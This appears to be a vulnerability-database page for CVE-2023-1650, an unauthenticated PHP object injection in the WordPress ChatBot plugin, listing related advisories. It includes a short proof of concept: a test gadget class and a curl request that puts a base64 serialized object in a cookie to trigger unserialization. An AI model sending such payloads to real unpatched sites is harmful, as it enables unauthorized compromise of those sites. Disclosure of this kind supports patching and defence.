ChatBot 4.4.7 Unauthenticated PHP Object Injectio
Reporter | Title | Published | Views | Family All 7 |
---|---|---|---|---|
![]() | Design/Logic Flaw | 8 May 202314:15 | – | prion |
![]() | ChatBot < 4.4.7 - Unauthenticated PHP Object Injection | 12 Apr 202300:00 | – | wpvulndb |
![]() | CVE-2023-1650 ChatBot < 4.4.7 - Unauthenticated PHP Object Injection | 8 May 202313:58 | – | vulnrichment |
![]() | WordPress ChatBot Plugin <= 4.4.6 is vulnerable to PHP Object Injection | 20 Apr 202300:00 | – | patchstack |
![]() | CVE-2023-1650 | 8 May 202314:15 | – | cve |
![]() | CVE-2023-1650 | 8 May 202314:15 | – | nvd |
![]() | CVE-2023-1650 ChatBot < 4.4.7 - Unauthenticated PHP Object Injection | 8 May 202313:58 | – | cvelist |
To simulate a gadget chain, put the following code in a plugin:
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Then, when a GPT engine is set as Open AI model in the settings (/wp-admin/admin.php?page=wpbot_openAi), make the below request to trigger the unserialisation:
curl -X 'POST' -b 'last_five_prompt=Tzo0OiJFdmlsIjowOnt9' 'https://example.com/wp-admin/admin-ajax.php?action=openai_response'
Tzo0OiJFdmlsIjowOnt9 being the base64 of O:4:"Evil":0:{}
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo